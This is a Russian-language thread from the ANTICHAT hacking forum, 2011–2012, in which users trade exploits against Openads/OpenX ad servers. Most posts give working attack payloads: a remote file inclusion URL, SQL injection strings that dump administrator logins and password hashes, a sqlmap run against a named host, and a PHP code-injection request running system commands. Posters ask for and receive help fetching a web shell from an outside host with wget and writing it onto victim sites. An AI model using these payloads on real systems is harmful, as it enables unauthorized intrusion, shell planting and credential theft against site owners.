ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.09.2011, 19:49
|
|
Новичок
Регистрация: 19.11.2007
Сообщений: 23
Провел на форуме: 147347
Репутация:
0
|
|
2.0.11 RFI
http://www.site.com/Openads-2.0.11/libraries/lib-view-main.inc.php?row=http://evil.txt?
|
|
|

29.09.2011, 18:30
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме: 305110
Репутация:
133
|
|
openx 2.8.7 exploit
openx 2.8.7
Хз нашел вчера мало полезно но хоть что то скуля в админке Слепая как крот
http://test.com/www/admin/updates-history.php
POST_data:
Сообщение от None
btn_clean_audit=Delete+Artifacts&upgrade_action_id =7{SQLINJ}
P.S Чуток покурил маны мускла склуля не слепая вывод есть
|
|
|

21.11.2011, 07:48
|
|
Новичок
Регистрация: 30.03.2010
Сообщений: 2
Провел на форуме: 21162
Репутация:
0
|
|
sqlmap -u "http://admin.oads.vimg.net/www/admin/updates-history.php" --method "POST" --data "btn_clean_audit=Delete+Artifacts&upgrade_action_i d=7" --dbs
[04:44:20] [INFO] testing connection to the target url
[04:44:21] [INFO] testing if the url is stable, wait a few seconds
[04:44:24] [INFO] url is stable
[04:44:24] [INFO] testing if POST parameter 'btn_clean_audit' is dynamic
[04:44:25] [WARNING] POST parameter 'btn_clean_audit' is not dynamic
[04:44:25] [INFO] testing if POST parameter 'upgrade_action_id' is dynamic
[04:44:25] [WARNING] POST parameter 'upgrade_action_id' is not dynamic
[04:44:25] [INFO] testing if Cookie parameter 'sessionID' is dynamic
[04:44:26] [WARNING] Cookie parameter 'sessionID' is not dynamic
[04:44:26] [INFO] testing if Cookie parameter 'OAGEO' is dynamic
[04:44:27] [WARNING] Cookie parameter 'OAGEO' is not dynamic
[04:44:27] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[04:44:27] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[*] shutting down at: 04:44:27
не работает
|
|
|

26.11.2011, 07:52
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме: 305110
Репутация:
133
|
|
Во первых желательно авторизоватся )))
А дальше xakep.ru/post/52222/default.asp - курить сдесь )
|
|
|

14.12.2011, 17:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от (Dm)
(Dm) said:
[ + ] Уязвимости Openads 2.4.0 - 2.4.2
>> Выполнение php кода
сплоит:
Цитата:
http://host/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la
Помогите с заливкой шелла. Нашел данную уязвимость.
Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=ls -la
выполняется
Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=whereis wget
выполняется
Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=wget http://site2.ru/shell.txt
не выполняется
пробовал аналогично и fetch, и curl - не хочет заливать.
также пробовал указать адрес site2.ru без http, пробовал закодировать в ascii, в base64 и т.д.
Как залить шелл?
|
|
|
|

15.12.2011, 23:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 30137
Репутация:
48
|
|
Сообщение от nevermore
nevermore said:
Помогите с заливкой шелла. Нашел данную уязвимость.
Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=ls -la
выполняется
Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=whereis wget
выполняется
Код:
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=wget http://site2.ru/shell.txt
не выполняется
пробовал аналогично и fetch, и curl - не хочет заливать.
также пробовал указать адрес site2.ru без http, пробовал закодировать в ascii, в base64 и т.д.
Как залить шелл?
может там нет права на запись? ну или попробуй:
wget http://sait.ru/shell.txt -O /home/polniu put' do papki/shell.php
Пусть можно легко узнать с помощью pwd
|
|
|
|

19.01.2012, 17:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Раскрытие путей, тестил на OpenX 2.8.7, 2.8.8
Exploit:
Код:
Code:
http://openx/www/delivery/dxmlrpc.php
P.S. Сегодня выручила
|
|
|
|

25.01.2012, 15:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 1216
Репутация:
0
|
|
sql injection
Код:
Code:
http://site.ru/www/delivery/ac.php?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0
версия openx 2.4.4
Данная уязвимость не выполняется. Пробовал на других сайтах и другие версии (2.6.0).
Подскажите пожалуйста как правильно ее использовать.
|
|
|
|

26.01.2012, 20:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 26362
Репутация:
1
|
|
Сообщение от Sadiel
Sadiel said:
sql injection
Код:
Code:
http://site.ru/www/delivery/ac.php?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0
версия openx 2.4.4
Данная уязвимость не выполняется. Пробовал на других сайтах и другие версии (2.6.0).
Подскажите пожалуйста как правильно ее использовать.
может префиксы другие, или таблицы старые! раскручивай просто как инъекцию, а не этому шаблону!
если нет то кидай сцыль
|
|
|
|

26.01.2012, 23:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 1216
Репутация:
0
|
|
Да, все понял, префиксы везде разные.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|